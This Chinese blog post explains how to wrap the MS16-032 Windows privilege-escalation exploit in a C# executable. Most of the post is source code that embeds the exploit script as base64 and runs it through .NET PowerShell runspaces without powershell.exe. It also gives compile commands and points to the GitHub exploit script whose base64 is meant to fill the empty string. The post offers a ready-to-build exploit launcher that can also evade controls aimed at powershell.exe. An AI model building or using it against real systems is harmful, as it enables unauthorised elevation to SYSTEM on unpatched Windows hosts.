授人以鱼不如授人以渔

之前的MS16-032是个powershell脚本,怎么样改成exe呢,很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
  class Program
  {
    static string _application;
    static string _commandline;
    static int Main(string[] args)
    {
       if (args.Length == 0)
      {
        System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c clac.exe\"");
        return 1;
      }
       else if (args.Length ==1)
      {

        _application = args[0];     
        PowerShellExecutor t = new PowerShellExecutor();
        t.ExecuteSynchronously(_application, "");
      }
      else if(args.Length == 2)
      {
        _application = args[0];
        _commandline = args[1];
        PowerShellExecutor t = new PowerShellExecutor();
        t.ExecuteSynchronously(_application, _commandline);
      }
      return 0;
      
    }
  }

  class PowerShellExecutor
  {
    public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@""));
    public void ExecuteSynchronously(string aplication,string commandline)
    {
      string Commandout;
      InitialSessionState iss = InitialSessionState.CreateDefault();
      Runspace rs = RunspaceFactory.CreateRunspace(iss);
      rs.Open();
      PowerShell ps = PowerShell.Create();
      ps.Runspace = rs;
      ps.AddScript(PSInvoke_MS16_032);
      if (commandline != "")
      {
         Commandout = "Invoke-MS16-032 -Application \"" + aplication + "\" -Commandline " + "\""+commandline+"\"";
      }
      else{
         Commandout = "Invoke-MS16-032 -Application " + aplication;
      }
      Console.WriteLine(Commandout);
      ps.AddScript(Commandout);
      ps.AddCommand("Out-Default");
      ps.Invoke();
      rs.Close();
    }
  }
}

base64的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 的所有内容的base64编码(你可以使用你自己的powershell脚本),由于我改的这个是有参数的,所以简单的写了上面的c#代码,通过.net来执行powershell。

编译需要System.Management.Automation.dll,具体步骤在cs文件里面已经写了,你们自己编译吧,只是对本机进行了测试,没测试别的,测试Demo如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过.net来执行powershell,并不需要powershell.exe 。详情可以看一下 p0wnedShell 或者 http://zone.wooyun.org/content/26831

.net 2.0下编译的版本在这里

最后由 Evi1cg 编辑于2017年01月17日 16:15